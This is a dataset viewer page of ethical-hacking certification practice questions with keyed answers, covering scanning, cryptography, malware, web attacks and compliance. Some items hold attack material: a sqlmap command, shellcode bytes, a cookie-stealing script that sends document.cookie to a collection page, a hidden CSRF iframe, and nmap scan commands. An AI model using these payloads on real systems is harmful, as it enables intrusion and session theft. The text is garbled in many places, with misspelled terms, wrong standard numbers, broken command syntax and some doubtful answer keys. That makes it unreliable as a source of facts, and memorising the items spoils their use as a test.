Dataset Viewer
question
stringlengths 123
1.01k
| answer
stringclasses 5
values |
---|---|
You have successfully logged on a Linux system. You want to now cover your trade Your login attempt may
be logged on several files located in /var/log. Which file does NOT belongs to the list:
A. user.log
B. auth.fesg
C. wtmp
D. btmp
| A |
What is the following command used for?
sqlmap.py-u
,,http://10.10.1.20/?p=1
&forumaction=search" -dbs
A. Creating backdoors using SQL injection
B. A Enumerating the databases in the DBMS for the URL
C. Retrieving SQL statements being executed on the database
D. Searching database statements at the IP address given
| B |
Sam, a web developer, was instructed to incorporate a hybrid encryption software program into a web
application to secure email messages. Sam used an encryption software, which is a free implementation of the
OpenPGP standard that uses both symmetric-key cryptography and asymmetric-key cryptography for
improved speed and secure key exchange. What is the encryption software employed by Sam for securing the
email messages?
A. PGP
B. S/MIME
C. SMTP
D. GPG
| D |
Which of the following is assured by the use of a hash?
A. Authentication
B. Confidentiality
C. Availability
D. Integrity
| D |
What is not a PCI compliance recommendation?
A. Use a firewall between the public network and the payment card data.
B. Use encryption to protect all transmission of card holder data over any public network.
C. Rotate employees handling credit card transactions on a yearly basis to different departments.
D. Limit access to card holder data to as few individuals as possible.
| C |
What is the proper response for a NULL scan if the port is closed?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
| E |
What kind of detection techniques is being used in antivirus software that identifies malware by collecting data
from multiple protected systems and instead of analyzing files locally it?s made on the provider?s
environment?
A. Behavioral based
B. Heuristics based
C. Honeypot based
D. Cloud based
| D |
Which type of security feature stops vehicles from crashing through the doors of a building?
A. Bollards
B. Receptionist
C. Mantrap
D. Turnstile
| A |
A large mobile telephony and data network operator has a data center that houses network elements. These are
essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and
IPS systems.
What is the best security policy concerning this setup?
A. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed.
B. As long as the physical access to the network elements is restricted, there is no need for additional measures.
C. There is no need for specific security measures on the network elements as long as firewalls and IPSsystems exist.
D. The operator knows that attacks and down time are inevitable and should have a backup site.
| A |
Which regulation defines security and privacy controls for Federal information systems and organizations?
A. HIPAA
B. EU Safe Harbor
C. PCI-DSS
D. NIST-800-53
| D |
is a set of extensions to DNS that provide the origin authentication of DNS data to DNS clients (resolvers) so
as to reduce the threat of DNS poisoning, spoofing, and similar types of attacks.
A. DNSSEC
B. Resource records
C. Resource transfer
D. Zone transfer
| A |
A hacker is an intelligent individual with excellent computer skills and the ability to explore a computer?s
software and hardware without the owner?s permission. Their intention can either be to simply gain knowledge
or to illegally make changes.
Which of the following class of hacker refers to an individual who works both offensively and defensively at
various times?
A. White Hat
B. Suicide Hacker
C. Gray Hat
D. Black Hat
| C |
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small sized packets
to the target computer, making it very difficult for an IDS to detect the attack signatures. Which tool can be
used to perform session splicing attacks?
A. tcpsplice
B. Burp
C. Hydra
D. Whisker
| D |
An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and
Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of
security. When the investigator attempts to correlate the information in all of the logs, the sequence of many of
the logged events do not match up.
What is the most likely cause?
A. The network devices are not all synchronized.
B. Proper chain of custody was not observed while collecting the logs.
C. The attacker altered or erased events from the logs.
D. The security breach was a false positive.
| A |
A zone file consists of which of the following Resource Records (RRs)?
A. DNS, NS, AXFR, and MX records
B. DNS, NS, PTR, and MX records
C. SOA, NS, AXFR, and MX records
D. SOA, NS, A, and MX records
| D |
If a tester is attempting to ping a target that exists but receives no response or a response that states the
destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option
could the tester use to get a response from a host using TCP?
A. Traceroute
B. Hping
C. TCP ping
D. Broadcast ping
| B |
This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to
protect sensitive data, such as GCMP-2S6. MMAC-SHA384, and ECDSA using a 384-bit elliptic curve.
Which is this wireless security protocol?
A. WPA2 Personal
B. WPA3-Personal
C. WPA2-Enterprise
D. WPA3-Enterprise
| D |
John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory
services. He used an automated tool to anonymously query the IDAP service for sensitive information such as
usernames. addresses, departmental details, and server names to launch further attacks on the target
organization.
What is the tool employed by John to gather information from the IDAP service?
A. jxplorer
B. Zabasearch
C. EarthExplorer
D. Ike-scan
| A |
A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since
the file did nothing when executed, he asks you for help because he suspects that he may have installed a
trojan on his computer.
what tests would you perform to determine whether his computer Is Infected?
A. Use ExifTool and check for malicious content.
B. You do not check; rather, you immediately restore a previous snapshot of the operating system.
C. Upload the file to VirusTotal.
D. Use netstat and check for outgoing connections to strange IP addresses or domains.
| D |
Which type of sniffing technique is generally referred as MiTM attack?
A. Password Sniffing
B. ARP Poisoning
C. Mac Flooding
D. DHCP Sniffing
| B |
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He
found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical
support team from a vendor. He warned that a specific server is about to be compromised and requested
sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual
commands and install malicious files, which were then used to collect and pass critical Information to
Johnson's machine. What is the social engineering technique Steve employed in the above scenario?
A. Quid pro quo
B. Diversion theft
C. Elicitation
D. Phishing
| A |
There have been concerns in your network that the wireless network component is not sufficiently secure. You
perform a vulnerability scan of the wireless network and find that it is using an old encryption protocol that
was designed to mimic wired encryption, what encryption protocol is being used?
A. WEP
B. RADIUS
C. WPA
D. WPA3
| A |
Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its
systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and
extracts information such as sender identities, mall servers, sender IP addresses, and sender locations from
different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API.
Which of the following tools is used by Wilson in the above scenario?
A. Factiva
B. Netcraft
C. infoga
D. Zoominfo
| C |
Allen, a professional pen tester, was hired by xpertTech solutWns to perform an attack simulation on the
organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted
the NetBIOS service. B/enumerating NetBIOS, he found that port 139 was open and could see the resources
that could be accessed or viewed on a remote system. He came across many NetBIOS codes during
enumeration.
identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?
A. <1B>
B. <00>
C. <03>
D. <20>
| C |
When discussing passwords, what is considered a brute force attack?
A. You attempt every single possibility until you exhaust all possible combinations or discover the password
B. You threaten to use the rubber hose on someone unless they reveal their password
C. You load a dictionary of words into your cracking program
D. You create hashes of a large number of words and compare it with the encrypted passwords
E. You wait until the password expires
| A |
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the
program exploit.c
char shellcode[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
What is the hexadecimal value of NOP instruction?
A. 0x60
B. 0x80
C. 0x70
D. 0x90
| D |
Yancey is a network security administrator for a large electric company. This company provides power for
over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become
very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he
will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and
backdoors all over the network to take down the company once he has left. Yancey does not care if his actions
land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him.
What would Yancey be considered?
A. Yancey would be considered a Suicide Hacker
B. Since he does not care about going to jail, he would be considered a Black Hat
C. Because Yancey works for the company currently; he would be a White Hat
D. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing
| A |
Why containers are less secure that virtual machines?
A. Host OS on containers has a larger surface attack.
B. Containers may full fill disk space of the host.
C. A compromise container may cause a CPU starvation of the host.
D. Containers are attached to the same virtual network.
| A |
George is a security professional working for iTech Solutions. He was tasked with securely transferring
sensitive data of the organization between industrial systems. In this process, he used a short-range
communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer
data infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless
communication technology George employed in the above scenario?
A. MQTT
B. LPWAN
C. Zigbee
D. NB-IoT
| C |
You are performing a penetration test for a client and have gained shell access to a Windows machine on the
internal network. You intend to retrieve all DNS records for the internal domain, if the DNS server is at
192.168.10.2 and the domain name is abccorp.local, what command would you type at the nslookup prompt to
attempt a zone transfer?
A. list server=192.168.10.2 type=all
B. is-d abccorp.local
C. Iserver 192.168.10.2-t all
D. List domain=Abccorp.local type=zone
| B |
_________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept
keystrokes.
A. Trojan
B. RootKit
C. DoS tool
D. Scanner
E. Backdoor
| B |
Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these
switches.
If these switches' ARP cache is successfully flooded, what will be the result?
A. The switches will drop into hub mode if the ARP cache is successfully flooded.
B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.
C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.
D. The switches will route all traffic to the broadcast address created collisions.
| A |
what firewall evasion scanning technique make use of a zombie system that has low network activity as well
as its fragment identification numbers?
A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning
| D |
Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the Integrity of
updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT.
POST. GET. and DELETE and can improve the overall performance, visibility, scalability, reliability, and
portability of an application. What is the type of web-service API mentioned in the above scenario?
A. JSON-RPC
B. SOAP API
C. RESTful API
D. REST API
| C |
What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?
A. Copy the system files from a known good system
B. Perform a trap and trace
C. Delete the files and try to determine the source
D. Reload from a previous backup
E. Reload from known good media
| E |
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the
application she is working on. She utilizes a component that can process API requests and handle various
Docker objects, such as containers, volumes. Images, and networks. What is the component of the Docker
architecture used by Annie in the above scenario?
A. Docker client
B. Docker objects
C. Docker daemon
D. Docker registries
| C |
Widespread fraud ac Enron. WorldCom, and Tyco led to the creation of a law that was designed to improve
the accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that
provide financial services to some organizations and came into effect in 2002. This law is known by what
acronym?
A. Fed RAMP
B. PCIDSS
C. SOX
D. HIPAA
| C |
Jim, a professional hacker, targeted an organization that is operating critical Industrial Infrastructure. Jim used
Nmap to scan open pons and running services on systems connected to the organization's OT network. He
used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered
Information such as the vendor name, product code and name, device name, and IP address. Which of the
following Nmap commands helped Jim retrieve the required information?
A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >
B. nmap -Pn -sU -p 44818 --script enip-info < Target IP >
C. nmap -Pn -sT -p 46824 < Target IP >
D. nmap -Pn -sT -p 102 --script s7-info < Target IP >
| B |
Abel, a security professional, conducts penetration testing in his client organization to check for any security
loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all
the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This
led to a Dos attack, and as a result, legitimate employees were unable to access the clients network. Which of
the following attacks did Abel perform in the above scenario?
A. VLAN hopping
B. DHCP starvation
C. Rogue DHCP server attack
D. STP attack
| B |
"Testing the network using the same methodologies and tools employed by attackers"
Identify the correct terminology that defines the above statement.
A. Vulnerability Scanning
B. Penetration Testing
C. Security Policy Implementation
D. Designing Network Security
| B |
in the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium
vulnerability fall in?
A. 3.0-6.9
B. 40-6.0
C. 4.0-6.9
D. 3.9-6.9
| C |
In the field of cryptanalysis, what is meant by a ?rubber-hose" attack?
A. Attempting to decrypt cipher text by making logical assumptions about the contents of the original plaintext.
B. Extraction of cryptographic secrets through coercion or torture.
C. Forcing the targeted key stream through a hardware-accelerated device such as an ASIC.
D. A backdoor placed into a cryptographic algorithm by its creator.
| B |
The network team has well-established procedures to follow for creating new rules on the firewall. This
includes having approval from a manager prior to implementing any new rules. While reviewing the firewall
configuration, you notice a recently implemented rule but cannot locate manager approval for it. What would
be a good step to have in the procedures for a situation like this?
A. Have the network team document the reason why the rule was implemented without prior manager approval.
B. Monitor all traffic using the firewall rule until a manager can approve it.
C. Do not roll back the firewall rule as the business may be relying upon it, but try to get manager approval as soon as possible.
D. Immediately roll back the firewall rule until a manager can approve it
| D |
Susan, a software developer, wants her web API to update other applications with the latest information. For
this purpose, she uses a user-defined HTTP tailback or push APIs that are raised based on trigger events: when
invoked, this feature supplies data to other applications so that users can instantly receive real-time
Information.
Which of the following techniques is employed by Susan?
A. web shells
B. Webhooks
C. REST API
D. SOAP API
| B |
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an
organization?
A. The attacker queries a nameserver using the DNS resolver.
B. The attacker makes a request to the DNS resolver.
C. The attacker forges a reply from the DNS resolver.
D. The attacker uses TCP to poison the ONS resofver.
| B |
Ricardo has discovered the username for an application in his targets environment. As he has a limited amount
of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them
into a list and then feeds that list as an argument into his password-cracking application, what type of attack is
Ricardo performing?
A. Known plaintext
B. Password spraying
C. Brute force
D. Dictionary
| D |
Sam is working as a system administrator In an organization. He captured the principal characteristics of a
vulnerability and produced a numerical score to reflect Its severity using CVSS v3.0 to property assess and
prioritize the organization's vulnerability management processes. The base score that Sam obtained after
performing cvss rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the
above scenario?
A. Medium
B. Low
C. Critical
D. High
| A |
How is the public key distributed in an orderly, controlled fashion so that the users can be sure of the sender?s
identity?
A. Hash value
B. Private key
C. Digital signature
D. Digital certificate
| D |
At what stage of the cyber kill chain theory model does data exfiltration occur?
A. Actions on objectives
B. Weaponization
C. installation
D. Command and control
| A |
Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After
establishing the connection with the public computer, Steven enabled iTunes WI-FI sync on the computer so
that the device could continue communication with that computer even after being physically disconnected.
Now, Clark gains access to Steven?s iPhone through the infected computer and is able to monitor and read all
of Steven?s activity on the iPhone, even after the device is out of the communication zone.
Which of the following attacks is performed by Clark in above scenario?
A. IOS trustjacking
B. lOS Jailbreaking
C. Exploiting SS7 vulnerability
D. Man-in-the-disk attack
| A |
During the process of encryption and decryption, what keys are shared?
A. Private keys
B. User passwords
C. Public keys
D. Public and private keys
| C |
Abel, a cloud architect, uses container technology to deploy applications/software including all its
dependencies, such as libraries and configuration files, binaries, and other resources that run independently
from other processes in the cloud environment. For the containerization of applications, he follows the five-tier
container technology architecture. Currently. Abel is verifying and validating image contents, signing images,
and sending them to the registries. Which of the following tiers of the container technology architecture Is
Abel currently working in?
A. Tier-1: Developer machines
B. Tier-4: Orchestrators
C. Tier-3: Registries
D. Tier-2: Testing and accreditation systems
| D |
What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?
A. All are hacking tools developed by the legion of doom
B. All are tools that can be used not only by hackers, but also security personnel
C. All are DDOS tools
D. All are tools that are only effective against Windows
E. All are tools that are only effective against Linux
| C |
Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web
server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a
countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the web server?
A. Enable unused default user accounts created during the installation of an OS
B. Enable all non-interactive accounts that should exist but do not require interactive login
C. Limit the administrator or toot-level access to the minimum number of users
D. Retain all unused modules and application extensions
| C |
In order to tailor your tests during a web-application scan, you decide to determine which web-server version
is hosting the application. On using the sV flag with Nmap. you obtain the following response:
80/tcp open http-proxy Apache Server 7.1.6
what Information-gathering technique does this best describe?
A. WhOiS lookup
B. Banner grabbing
C. Dictionary attack
D. Brute forcing
| B |
what is the port to block first in case you are suspicious that an loT device has been compromised?
A. 22
B. 443
C. 48101
D. 80
| C |
A newly joined employee. Janet, has been allocated an existing system used by a previous employee. Before
issuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were
possibilities of compromise through user directories, registries, and other system parameters. He also
Identified vulnerabilities such as native configuration tables, incorrect registry or file permissions, and
software configuration errors. What is the type of vulnerability assessment performed by Martin?
A. Credentialed assessment
B. Database assessment
C. Host-based assessment
D. Distributed assessment
| C |
You are a penetration tester working to test the user awareness of the employees of the client xyz. You
harvested two employees' emails from some public sources and are creating a client-side backdoor to send it to
the employees via email. Which stage of the cyber kill chain are you at?
A. Reconnaissance
B. Command and control
C. Weaponization
D. Exploitation
| C |
Which file is a rich target to discover the structure of a website during web-server footprinting?
A. Document root
B. Robots.txt
C. domain.txt
D. index.html
| B |
Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on
the network lo identify the active systems, network services, applications, and vulnerabilities. He also obtained
the list of the users who are currently accessing the network. What is the type of vulnerability assessment that
Morris performed on the target organization?
A. internal assessment
B. Passive assessment
C. External assessment
D. Credentialed assessment
| B |
jane, an ethical hacker. Is testing a target organization's web server and website to identity security loopholes.
In this process, she copied the entire website and its content on a local drive to view the complete profile of the
site's directory structure, file structure, external links, images, web pages, and so on. This information helps
jane map the website's directories and gain valuable information. What is the attack technique employed by
Jane in the above scenario?
A. website mirroring
B. Session hijacking
C. Web cache poisoning
D. Website defacement
| A |
What information security law or standard aims at protecting stakeholders and the general public from
accounting errors and fraudulent activities within organizations?
A. PCI-DSS
B. FISMA
C. SOX
D. ISO/I EC 27001:2013
| C |
CyberTech Inc. recently experienced SQL injection attacks on its official website. The company appointed
Bob, a security professional, to build and incorporate defensive strategies against such attacks. Bob adopted a
practice whereby only a list of entities such as the data type, range, size, and value, which have been approved
for secured access, is accepted. What is the defensive technique employed by Bob in the above scenario?
A. Output encoding
B. Enforce least privileges
C. Whitelist validation
D. Blacklist validation
| C |
A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the
current time from the target host machine.
Which of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan?
A. -PY
B. -PU
C. -PP
D. -Pn
| C |
Which of the following antennas is commonly used in communications for a frequency band of 10 MHz to
VHF and UHF?
A. Yagi antenna
B. Dipole antenna
C. Parabolic grid antenna
D. Omnidirectional antenna
| A |
Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web
server to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an
automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other
vulnerabilities in the target server. Which of the following tools is used by Jack to perform vulnerability
scanning?
A. Infoga
B. WebCopier Pro
C. Netsparker
D. NCollector Studio
| C |
in this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by
manipulating and replaying cryptographic handshake messages. When the victim reinstall the key, associated
parameters such as the incremental transmit packet number and receive packet number are reset to their initial
values. What is this attack called?
A. Chop chop attack
B. KRACK
C. Evil twin
D. Wardriving
| B |
Which among the following is the best example of the third step (delivery) in the cyber kill chain?
A. An intruder sends a malicious attachment via email to a target.
B. An intruder creates malware to be used as a malicious attachment to an email.
C. An intruder's malware is triggered when a target opens a malicious email attachment.
D. An intruder's malware is installed on a target's machine.
| A |
_________ is a type of phishing that targets high-profile executives such as CEOs, CFOs, politicians, and
celebrities who have access to confidential and highly valuable information.
A. Spear phishing
B. Whaling
C. Vishing
D. Phishing
| B |
Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several
of these usually have protections against external sources but are frequently susceptible to internal users. He
decides to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a
financial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file
onto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh
performed?
A. Exploitation
B. Weaponization
C. Delivery
D. Reconnaissance
| B |
Lewis, a professional hacker, targeted the loT cameras and devices used by a target venture-capital firm. He
used an information-gathering tool to collect information about the loT devices connected to a network, open
ports and services, and the attack surface area. Using this tool, he also generated statistical reports on broad
usage patterns and trends. This tool helped Lewis continually monitor every reachable server and device on the
Internet, further allowing him to exploit these devices in the network. Which of the following tools was
employed by Lewis in the above scenario?
A. Censys
B. Wapiti
C. NeuVector
D. Lacework
| A |
Rebecca, a security professional, wants to authenticate employees who use web services for safe and secure
communication. In this process, she employs a component of the Web Service Architecture, which is an
extension of SOAP, and it can maintain the integrity and confidentiality of SOAP messages.
Which of the following components of the Web Service Architecture is used by Rebecca for securing the
communication?
A. WSDL
B. WS Work Processes
C. WS-Policy
D. WS-Security
| D |
The network users are complaining because their system are slowing down. Further, every time they attempt to
go a website, they receive a series of pop-ups with advertisements. What types of malware have the system
been infected with?
A. Virus
B. Spyware
C. Trojan
D. Adware
| D |
Geena, a cloud architect, uses a master component in the Kubernetes cluster architecture that scans newly
generated pods and allocates a node to them. This component can also assign nodes based on factors such as
the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload
interventions.
Which of the following master components is explained in the above scenario?
A. Kube-controller-manager
B. Kube-scheduler
C. Kube-apiserver
D. Etcd cluster
| B |
Calvin, a software developer, uses a feature that helps him auto-generate the content of a web page without
manual involvement and is integrated with SSI directives. This leads to a vulnerability in the developed web
application as this feature accepts remote user inputs and uses them on the page. Hackers can exploit this
feature and pass malicious SSI directives as input values to perform malicious activities such as modifying and
erasing server files. What is the type of injection attack Calvin's web application is susceptible to?
A. Server-side template injection
B. Server-side JS injection
C. CRLF injection
D. Server-side includes injection
| D |
In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a
list of employee and client email addresses and other related information by using various search engines,
social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a
list of words from the target website to further perform a brute-force attack on the previously gathered email
addresses.
What is the tool used by Hailey for gathering a list of words from the target website?
A. Shadowsocks
B. CeWL
C. Psiphon
D. Orbot
| B |
On performing a risk assessment, you need to determine the potential impacts when some of the critical
business processes of the company interrupt its service.
What is the name of the process by which you can determine those critical businesses?
A. Emergency Plan Response (EPR)
B. Business Impact Analysis (BIA)
C. Risk Mitigation
D. Disaster Recovery Planning (DRP)
| B |
You are a penetration tester and are about to perform a scan on a specific server. The agreement that you
signed with the client contains the following specific condition for the scan: ?The attacker must scan every
port on the server several times using a set of spoofed sources IP addresses. ? Suppose that you are using
Nmap to perform this scan. What flag will you use to satisfy this requirement?
A. The -A flag
B. The -g flag
C. The -f flag
D. The -D flag
| D |
You are a security officer of a company. You had an alert from IDS that indicates that one PC on your Intranet
is connected to a blacklisted IP address (C2 Server) on the Internet. The IP address was blacklisted just before
the alert. You are starting an investigation to roughly analyze the severity of the situation. Which of the
following is appropriate to analyze?
A. IDS log
B. Event logs on domain controller
C. Internet Firewall/Proxy log.
D. Event logs on the PC
| C |
Jack, a disgruntled ex-employee of Incalsol Ltd., decided to inject fileless malware into Incalsol's systems. To
deliver the malware, he used the current employees' email IDs to send fraudulent emails embedded with
malicious links that seem to be legitimate. When a victim employee clicks on the link, they are directed to a
fraudulent website that automatically loads Flash and triggers the exploit. What is the technique used byjack to
launch the fileless malware on the target systems?
A. In-memory exploits
B. Phishing
C. Legitimate applications
D. Script-based injection
| B |
George, an employee of an organization, is attempting to access restricted websites from an official computer.
For this purpose, he used an anonymizer that masked his real IP address and ensured complete and continuous
anonymity for all his online activities. Which of the following anonymizers helps George hide his activities?
A. https://www.baidu.com
B. https://www.guardster.com
C. https://www.wolframalpha.com
D. https://karmadecay.com
| B |
Which wireless security protocol replaces the personal pre-shared key (PSK) authentication with Simultaneous
Authentication of Equals (SAE) and is therefore resistant to offline dictionary attacks?
A. WPA3-Personal
B. WPA2-Enterprise
C. Bluetooth
D. ZigBee
| A |
When you are testing a web application, it is very useful to employ a proxy tool to save every request and
response. You can manually test every request and analyze the response to find vulnerabilities. You can test
parameter and headers manually to get more precise results than if using web vulnerability scanners.
What proxy tool will help you find web vulnerabilities?
A. Maskgen
B. Dimitry
C. Burpsuite
D. Proxychains
| C |
A "Server-Side Includes" attack refers to the exploitation of a web application by injecting scripts in HTML
pages or executing arbitrary code remotely.
Which web-page file type, if it exists on the web server, is a strong indication that the server is vulnerable to
this kind of attack?
A. .stm
B. .html
C. .rss
D. .cms
| A |
You have compromised a server on a network and successfully opened a shell. You aimed to identify all
operating systems running on the network. However, as you attempt to fingerprint all machines in the network
using the nmap syntax below, it is not going through.
invictus@victim_server.~$ nmap -T4 -O 10.10.0.0/24 TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx
xxxxxxxxx. QUITTING!
What seems to be wrong?
A. The nmap syntax is wrong.
B. This is a common behavior for a corrupted nmap application.
C. The outgoing TCP/IP fingerprinting is blocked by the host firewall.
D. OS Scan requires root privileges.
| D |
A penetration tester is performing the footprinting process and is reviewing publicly available information
about an organization by using the Google search engine.
Which of the following advanced operators would allow the pen tester to restrict the search to the
organization?s web domain?
A. [allinurl:]
B. [location:]
C. [site:]
D. [link:]
| C |
Becky has been hired by a client from Dubai to perform a penetration test against one of their remote offices.
Working from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic
information about their network. When analyzing the results of her Whois search, Becky notices that the IP
was allocated to a location in Le Havre, France. Which regional Internet registry should Becky go to for
detailed information?
A. ARIN
B. APNIC
C. RIPE
D. LACNIC
| C |
A company?s Web development team has become aware of a certain type of security vulnerability in their
Web software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the
software requirements to disallow users from entering HTML as input into their Web application.
What kind of Web application vulnerability likely exists in their software?
A. Cross-site scripting vulnerability
B. SQL injection vulnerability
C. Web site defacement vulnerability
D. Gross-site Request Forgery vulnerability
| A |
Which of the following provides a security professional with most information about the system?s security
posture?
A. Phishing, spamming, sending trojans
B. Social engineering, company site browsing tailgating
C. Wardriving, warchalking, social engineering
D. Port scanning, banner grabbing service identification
| D |
BitLocker encryption has been implemented for all the Windows-based computers in an organization. You are
concerned that someone might lose their cryptographic key. Therefore, a mechanism was implemented to
recover the keys from Active Directory. What is this mechanism called in cryptography?
A. Key archival
B. Key escrow.
C. Certificate rollover
D. Key renewal
| B |
What would be the purpose of running "wget 192.168.0.15 -q -S" against a web server?
A. Performing content enumeration on the web server to discover hidden folders
B. Using wget to perform banner grabbing on the webserver
C. Flooding the web server with requests to perform a DoS attack
D. Downloading all the contents of the web page locally for further examination
| B |
Judy created a forum, one day. she discovers that a user is posting strange images without writing comments.
She immediately calls a security expert, who discovers that the following code is hidden behind those images:
<script>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</script>
What issue occurred for the users who clicked on the image?
A. The code inject a new cookie to the browser.
B. The code redirects the user to another site.
C. The code is a virus that is attempting to gather the users username and password.
D. This php file silently executes the code and grabs the users session cookie and session ID.
| D |
Stella, a professional hacker, performs an attack on web services by exploiting a vulnerability that provides
additional routing information in the SOAP header to support asynchronous communication. This further
allows the transmission of web-service requests and response messages using different TCP connections.
Which of the following attack techniques is used by Stella to compromise the web services?
A. XML injection
B. WS-Address spoofing
C. SOAPAction spoofing
D. Web services parsing attacks
| B |
If executives are found liable for not properly protecting their company?s assets and information systems, what
type of law would apply in this situation?
A. Criminal
B. International
C. Common
D. Civil
| D |
An attacker changes the profile information of a particular user (victim) on the target website. The attacker
uses this string to update the victim?s profile to a text file and then submit the data to the attacker?s database.
<
iframe src=??http://www.vulnweb.com/updateif.php?? style=??display:none??
> < /iframe >
What is this type of attack (that can use either HTTP GET or HTTP POST) called?
A. Browser Hacking
B. Cross-Site Scripting
C. SQL Injection
D. Cross-Site Request Forgery
| D |
You start performing a penetration test against a specific website and have decided to start from grabbing all
the links from the main page.
What Is the best Linux pipe to achieve your milestone?
A. dirb https://site.com | grep "site"
B. curl -s https://sile.com | grep ??< a href-\?http" | grep "Site-com- | cut -d "V" -f 2
C. wget https://stte.com | grep "< a href=\*http" | grep "site.com"
D. wgethttps://site.com | cut-d"http-
| C |
Upon establishing his new startup, Tom hired a cloud service provider (CSP) but was dissatisfied with their
service and wanted to move to another CSP.
What part of the contract might prevent him from doing so?
A. Virtualization
B. Lock-in
C. Lock-down
D. Lock-up
| B |
In both pharming and phishing attacks, an attacker can create websites that look similar to legitimate sites with
the intent of collecting personal identifiable information from its victims.
What is the difference between pharming and phishing attacks?
A. In a pharming attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack, an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name
B. In a phishing attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack, an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name
C. Both pharming and phishing attacks are purely technical and are not considered forms of social engineering
D. Both pharming and phishing attacks are identical
| A |
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity
and navigate anonymously to obtain sensitive/hidden information about official government or federal
databases. After gathering the Information, he successfully performed an attack on the target government
organization without being traced. Which of the following techniques is described in the above scenario?
A. Dark web footprinting
B. VoIP footpnnting
C. VPN footprinting
D. website footprinting
| A |
When considering how an attacker may exploit a web server, what is web server footprinting?
A. When an attacker implements a vulnerability scanner to identify weaknesses
B. When an attacker creates a complete profile of the site's external links and file structures
C. When an attacker gathers system-level data, including account details and server names
D. When an attacker uses a brute-force attack to crack a web-server password
| B |
End of preview. Expand
in Data Studio
README.md exists but content is empty.
- Downloads last month
- 119